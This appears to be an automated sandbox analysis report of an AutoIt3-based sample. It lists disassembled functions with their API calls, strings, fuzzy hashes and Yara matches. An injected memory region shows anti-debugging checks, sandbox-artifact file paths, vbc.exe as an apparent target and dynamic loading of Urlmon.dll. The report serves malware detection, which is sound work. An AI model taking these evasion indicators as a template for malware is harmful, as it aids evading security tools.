Opcode ID: d12507ff76ce6db87dde5b3ca9c9c0a967234e609c8c2539c9565e0de5903e2e
Instruction ID: 57f0fde1bb4959d0234874f080fb186df1a524a509fea601535bbde15adf7305
Opcode Fuzzy Hash: d12507ff76ce6db87dde5b3ca9c9c0a967234e609c8c2539c9565e0de5903e2e
Instruction Fuzzy Hash: D791F43554ABC0DECB31CB6884651AABFE16F29301F980A9ED4DB83A01D235B68CD75D

Function 00C41663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00C429E2: GetWindowLongW.USER32(?,000000EB), ref: 00C429F3

DefDlgProcW.USER32(?,?,?,?,?), ref: 00C41DD6
GetSysColor.USER32(0000000F), ref: 00C41E2A
SetBkColor.GDI32(?,00000000), ref: 00C41E3D

Part of subcall function 00C4166C: DefDlgProcW.USER32(?,00000020,?), ref: 00C416B4

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 02c96de9f1c029147a8114b04dc219b0fa4598c090ce8ce79408687695d323fd
Instruction ID: 00f672129413cc88a6777939c4891541d5e4cb06dffdcacf322a6fe46840f870
Opcode Fuzzy Hash: 02c96de9f1c029147a8114b04dc219b0fa4598c090ce8ce79408687695d323fd
Instruction Fuzzy Hash: 52A15AF4515A04BAE73A6B6A8C49FBF295DFF41301F1C810EFC96C5195CB209E81E275

Function 00C4B020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON

Download Yara Rule

APIs

Part of subcall function 00C53740: CharUpperBuffW.USER32(?,00D071DC,00000000,?,00000000,00D071DC,?,00C453A5,?,?,?,?), ref: 00C5375D

_memmove.LIBCMT ref: 00C4B68A

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: BuffCharUpper_memmove
String ID:
API String ID: 2819905725-0
Opcode ID: b2ff78e17fe034518cc0b1ed2a20ad180ff585227edf629f4cda0b76ec8ad778
Instruction ID: e5d3ede4f6fb0dc3dfc91c9ea251461f78bc0986eb13f10dc7babade145f8bb1
Opcode Fuzzy Hash: b2ff78e17fe034518cc0b1ed2a20ad180ff585227edf629f4cda0b76ec8ad778
Instruction Fuzzy Hash: 42A289706087419FC724DF25C484B2ABBE1FF88704F14895DE8AA8B362D771EE45DB92

Function 00C4BC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00C4BF57

Part of subcall function 00C452B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C452E6

Sleep.KERNEL32(0000000A,?,?), ref: 00C836B5

Strings

@GUI_WINHANDLE, xrefs: 00C837C1
CALL, xrefs: 00C4C277
@TRAY_ID, xrefs: 00C83FCD
@GUI_CTRLHANDLE, xrefs: 00C83816
@COM_EVENTOBJ, xrefs: 00C83D2E
@GUI_CTRLID, xrefs: 00C8376C

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
API String ID: 1792118007-922114024
Opcode ID: a007199c33d1bfb5d9d7b8092d63bc4e5d7fe49671989e404ebcff0b56fc71c4
Instruction ID: c200cfe2df58b5ad961c42c73ebf88cbbc600c017e194c6d9c8fdba755d383d8
Opcode Fuzzy Hash: a007199c33d1bfb5d9d7b8092d63bc4e5d7fe49671989e404ebcff0b56fc71c4
Instruction Fuzzy Hash: CFC2BE706083419FD728EF24C884BAEB7E5BF84704F14491DF89A872A1CB71EE45DB56

Function 0474E17C Relevance: 49.4, APIs: 6, Strings: 22, Instructions: 410
threadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 0474E1A4
GetThreadDesktop.USER32(00000000,00000000,0474E7E6,?,00000014,00000000,00000000), ref: 0474E1AA
IsDebuggerPresent.KERNEL32(00000000,00000000,0474E7E6,?,00000014,00000000,00000000), ref: 0474E1F9
Sleep.KERNEL32(000007D0,00000000,00000000,0474E7E6,?,00000014,00000000,00000000), ref: 0474E370
GetCurrentThreadId.KERNEL32 ref: 0474E692
Sleep.KERNEL32(00000064,00000000,00000000,0474E7E6,?,00000014,00000000,00000000), ref: 0474E377

Part of subcall function 04722E78: DeleteFileA.KERNEL32(00000000,00000000,04722ECC,?,00000001,?,?,0471F2B2,00000000,0471F309,?,00000000,00000000,00000000,00000000,00000000), ref: 04722EAB

Part of subcall function 04724B28: Sleep.KERNEL32(00000002,00000000,04724B99,?,00000001), ref: 04724B79

Strings

abby, xrefs: 0474E4C7
cc.txt, xrefs: 0474E2E6, 0474E314
c:\debugg, xrefs: 0474E2A9
c:\temp\test_ok, xrefs: 0474E215
vbc.exe, xrefs: 0474E515
xdebug 0 , xrefs: 0474E2C2
c:\temp\just_test.txt, xrefs: 0474E202
mutex0, xrefs: 0474E384
AU3, xrefs: 0474E41B
autoit3.exe, xrefs: 0474E725
Yes, xrefs: 0474E482, 0474E498, 0474E4E2, 0474E6B0
DLL, xrefs: 0474E44C
AHK, xrefs: 0474E3EA
script.a3x, xrefs: 0474E74B
uu.txt, xrefs: 0474E575, 0474E6D1, 0474E6FF
c.txt, xrefs: 0474E34F
test, xrefs: 0474E210
c:\tes2\, xrefs: 0474E786, 0474E794, 0474E79E
u.txt, xrefs: 0474E4FD, 0474E547
test.txt, xrefs: 0474E771
7.0.6, xrefs: 0474E1BC
mutex1, xrefs: 0474E3A6

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: SleepThread$Current$DebuggerDeleteDesktopFilePresent
String ID: 7.0.6$AHK$AU3$DLL$Yes$abby$autoit3.exe$c.txt$c:\debugg$c:\temp\just_test.txt$c:\temp\test_ok$c:\tes2\$cc.txt$mutex0$mutex1$script.a3x$test$test.txt$u.txt$uu.txt$vbc.exe$xdebug 0
API String ID: 416788666-834689721
Opcode ID: 8209f4cd4a3d010705da89aa12d1eb5ad84b3784341cf95a1d414f2bbe9e872d
Instruction ID: 370abeb88a31b8e13034484d2d957fa7fbec6884b1dc4d242e6455785aa302a7
Opcode Fuzzy Hash: 8209f4cd4a3d010705da89aa12d1eb5ad84b3784341cf95a1d414f2bbe9e872d
Instruction Fuzzy Hash: 41F12934A002688FFB10FBA8D984AED73B9FF85328F5084A4D544AB751DB74BD45CB62

Function 00C42BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C42C8C
GetSystemMetrics.USER32(00000007), ref: 00C42C94
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C42CBF
GetSystemMetrics.USER32(00000008), ref: 00C42CC7
GetSystemMetrics.USER32(00000004), ref: 00C42CEC
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C42D09
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C42D19
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C42D4C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C42D60
GetClientRect.USER32(00000000,000000FF), ref: 00C42D7E
GetStockObject.GDI32(00000011), ref: 00C42D9A
SendMessageW.USER32(00000000,00000030,00000000), ref: 00C42DA5

Part of subcall function 00C42714: GetCursorPos.USER32(?), ref: 00C42727
Part of subcall function 00C42714: ScreenToClient.USER32(00D077B0,?), ref: 00C42744
Part of subcall function 00C42714: GetAsyncKeyState.USER32(00000001), ref: 00C42769
Part of subcall function 00C42714: GetAsyncKeyState.USER32(00000002), ref: 00C42777

SetTimer.USER32(00000000,00000000,00000028,00C413C7), ref: 00C42DCC

Strings

AutoIt v3 GUI, xrefs: 00C42D44

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 6d77c7ab2a886807ebf7c7efa0db578edd2c5b419987f117a35f9b99d570110e
Instruction ID: 8c549a513b8682bc29c6848e636715fb5d80912a53184cd81767a8591faf9327
Opcode Fuzzy Hash: 6d77c7ab2a886807ebf7c7efa0db578edd2c5b419987f117a35f9b99d570110e
Instruction Fuzzy Hash: 4FB15171A0020A9FDB14DFA8DC9ABAD77B4FB48310F108129FA19E7290DB74E951CF64

Function 00C433E6 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00C43444
RegisterClassExW.USER32(00000030), ref: 00C4346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C4347F
InitCommonControlsEx.COMCTL32(?), ref: 00C4349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C434AC
LoadIconW.USER32(000000A9), ref: 00C434C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C434D1

Strings

TaskbarCreated, xrefs: 00C43474
0, xrefs: 00C43426
AutoIt v3 GUI, xrefs: 00C43460
+, xrefs: 00C4342D

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 316bb0560d13cc4baa7ef6f7590e0ec100d63abb95db28d5049c793420fdda4b
Instruction ID: 62b66bebfd6c47fda6731d1ef11618fe1b71b6a062191f2ee473020a87c060f8
Opcode Fuzzy Hash: 316bb0560d13cc4baa7ef6f7590e0ec100d63abb95db28d5049c793420fdda4b
Instruction Fuzzy Hash: C1312871945309AFDB408FA8D889BCDBBF0FB09310F20415AE594EA2A0E7B91581CFA1

Function 00C43411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00C43444
RegisterClassExW.USER32(00000030), ref: 00C4346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C4347F
InitCommonControlsEx.COMCTL32(?), ref: 00C4349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C434AC
LoadIconW.USER32(000000A9), ref: 00C434C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C434D1

Strings

TaskbarCreated, xrefs: 00C43474
0, xrefs: 00C43426
AutoIt v3 GUI, xrefs: 00C43460
+, xrefs: 00C4342D

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 7cdc0ac40ac218bed85aa53450501c2556183bd353725917b71e7453458d82d1
Instruction ID: 5b7ecb9157442caf8c73e29d4ab72e1d8e64b2d8701d2333e04b48d5daf9b5dc
Opcode Fuzzy Hash: 7cdc0ac40ac218bed85aa53450501c2556183bd353725917b71e7453458d82d1
Instruction Fuzzy Hash: 6121A3B1D05319AFDB409FA8E889B9DBBB4FB08710F10811AF614EA3A0D7B16544CFA5

Function 01799F9D Relevance: 18.2, APIs: 9, Strings: 3, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CharNextA.USER32(00000000), ref: 01799FF2
CharNextA.USER32(00000000,00000000), ref: 01799FFE
CharNextA.USER32(00000000,00000000), ref: 0179A026
CharNextA.USER32(00000000), ref: 0179A032
CharNextA.USER32(?,00000000), ref: 0179A073
CharNextA.USER32(00000000,?,00000000), ref: 0179A07F
CharNextA.USER32(00000000,?,00000000), ref: 0179A0B7
CharNextA.USER32(?,00000000), ref: 0179A0C3

Strings

, xrefs: 01799FC5
", xrefs: 0179A0A8
", xrefs: 0179A017

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: CharNext
String ID: $"$"
API String ID: 3213498283-938660540
Opcode ID: 2c1470450a8ac8ed7c5279c48aa1ab2b42540d99ab1694ed2cae7dec926c52fd
Instruction ID: 52b465005c765f83f146e11d44dae73716ad68ef3bed9d586bea7acea174fbd0
Opcode Fuzzy Hash: 2c1470450a8ac8ed7c5279c48aa1ab2b42540d99ab1694ed2cae7dec926c52fd
Instruction Fuzzy Hash: D751D770A052869FEB71DF6CE488A15FBF5EF6A350F240899E5C5CB302E735A848CB51

Function 00C52FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C600CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00C53094), ref: 00C600ED

Part of subcall function 00C608C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00C5309F), ref: 00C608E3

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C530E2
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C901BA
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C901FB
RegCloseKey.ADVAPI32(?), ref: 00C90239
_wcscat.LIBCMT ref: 00C90292

Strings

\Include\, xrefs: 00C5309F
Software\AutoIt v3\AutoIt, xrefs: 00C530D8
\, xrefs: 00C902B5
Include, xrefs: 00C901B1, 00C901F2

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 52aedb7d4ebf3335d29bb76e4835826a8db81c4ef89ee5c24dafbfa56d9a11bc
Instruction ID: 4f1b948309e5a389f9935ad3acee1cdc796c44a84559507a2e588d202dbeda3f
Opcode Fuzzy Hash: 52aedb7d4ebf3335d29bb76e4835826a8db81c4ef89ee5c24dafbfa56d9a11bc
Instruction Fuzzy Hash: BF7190715057019EC714EF25DC85A6BB7E8FF84340F54052EF899C32A1EF709988EB6A

Function 00C5514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00C55156
LoadCursorW.USER32(00000000,00007F00), ref: 00C55165
LoadIconW.USER32(00000063), ref: 00C5517C
LoadIconW.USER32(000000A4), ref: 00C5518E
LoadIconW.USER32(000000A2), ref: 00C551A0
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C551C6
RegisterClassExW.USER32(?), ref: 00C5521C

Part of subcall function 00C43411: GetSysColorBrush.USER32(0000000F), ref: 00C43444
Part of subcall function 00C43411: RegisterClassExW.USER32(00000030), ref: 00C4346E
Part of subcall function 00C43411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C4347F
Part of subcall function 00C43411: InitCommonControlsEx.COMCTL32(?), ref: 00C4349C
Part of subcall function 00C43411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C434AC
Part of subcall function 00C43411: LoadIconW.USER32(000000A9), ref: 00C434C2
Part of subcall function 00C43411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C434D1

Strings

#, xrefs: 00C55201
AutoIt v3, xrefs: 00C5520B
0, xrefs: 00C551FA

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: d4c41c5737c18dbb72912817dee8e8ee769c3c3f0544593aa2d952386e34773b
Instruction ID: 9038a77e4b88fa23236340f624735e4d6e01163a1cc36a053d19a2a07f3a18cb
Opcode Fuzzy Hash: d4c41c5737c18dbb72912817dee8e8ee769c3c3f0544593aa2d952386e34773b
Instruction Fuzzy Hash: F6214B70D05308AFEB109FB8ED09B9E7BB4FB08311F10011AF508AA3A0D7B56550DFA8

Function 00C54D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00C54E22
KillTimer.USER32(?,00000001), ref: 00C54E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C54E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C54E7A
CreatePopupMenu.USER32 ref: 00C54E8E
PostQuitMessage.USER32(00000000), ref: 00C54EAF

Strings

TaskbarCreated, xrefs: 00C54E75

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: c4d360e83de62b2c0a02c34713097fd3121b02c80197556ab316bb3af15e53c2
Instruction ID: 3a7625a05c6b43f2cd4cd30438530e6cbad0e8d3ec139203f32b958f1aa74e6b
Opcode Fuzzy Hash: c4d360e83de62b2c0a02c34713097fd3121b02c80197556ab316bb3af15e53c2
Instruction Fuzzy Hash: 7A414434608206ABDF185F28DC0FBBEB655F740306F140116FD15DA2E2CAE0ADD8A779

Function 047229D4 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 29
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0474E1EC,00000000,00000000,0474E7E6,?,00000014,00000000,00000000), ref: 047229DF
LoadLibraryA.KERNEL32(Urlmon.dll,?,0474E1EC,00000000,00000000,0474E7E6,?,00000014,00000000,00000000), ref: 04722A0B

Strings

ntdll.dll, xrefs: 04722A36
user32.dll, xrefs: 04722A12
Advapi32.dll, xrefs: 04722A1E
Urlmon.dll, xrefs: 04722A06
Shell32.dll, xrefs: 04722A2A
LoadLibraryA, xrefs: 047229F3
kernel32.dll, xrefs: 047229DA

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: Advapi32.dll$LoadLibraryA$Shell32.dll$Urlmon.dll$kernel32.dll$ntdll.dll$user32.dll
API String ID: 4133054770-1140356178
Opcode ID: 84f02297e302dc5546d3a02649268390147ee75d1258e358d72ec5ce46429a10
Instruction ID: e12d38e275e9dce5466943c4f5cfc22a793ebab499a9b54777c0e01950d3d2db
Opcode Fuzzy Hash: 84f02297e302dc5546d3a02649268390147ee75d1258e358d72ec5ce46429a10
Instruction Fuzzy Hash: D0F0B7B5544321AFA764AFB0E99D6693BB8FA0960130081D9E941DE716DBF4AC05CF12

Function 00C550DB Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,rrrrrrrr,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C55109
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C5512A
ShowWindow.USER32(00000000), ref: 00C5513E
ShowWindow.USER32(00000000), ref: 00C55147

Strings

edit, xrefs: 00C55124
AutoIt v3, xrefs: 00C55101, 00C55106, 00C55107
rrrrrrrr, xrefs: 00C550FC

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit$rrrrrrrr
API String ID: 1584632944-2302751933
Opcode ID: e4994b30112c4bc4ac5b452763fc153f21c13d1a4989f1c74664763d60ab807e
Instruction ID: dabe5268b6081731cf3c0cd48e211a9cc9dee28214673535289dd3fb81ebc3c6
Opcode Fuzzy Hash: e4994b30112c4bc4ac5b452763fc153f21c13d1a4989f1c74664763d60ab807e
Instruction Fuzzy Hash: 5DF0DA71D453947EEA3117376C4CF7B2E7DD7C6F50F11011ABA08EA2B1C6612851DAB4

Function 00CA9B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00C54A8C: _fseek.LIBCMT ref: 00C54AA4

Part of subcall function 00CA9CF1: _wcscmp.LIBCMT ref: 00CA9DE1
Part of subcall function 00CA9CF1: _wcscmp.LIBCMT ref: 00CA9DF4

_free.LIBCMT ref: 00CA9C5F
_free.LIBCMT ref: 00CA9C66
_free.LIBCMT ref: 00CA9CD1

Part of subcall function 00C62F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00C69C54,00000000,00C68D5D,00C659C3), ref: 00C62F99
Part of subcall function 00C62F85: GetLastError.KERNEL32(00000000,?,00C69C54,00000000,00C68D5D,00C659C3), ref: 00C62FAB

_free.LIBCMT ref: 00CA9CD9

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00CA9B8F

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID: >>>AUTOIT SCRIPT<<<
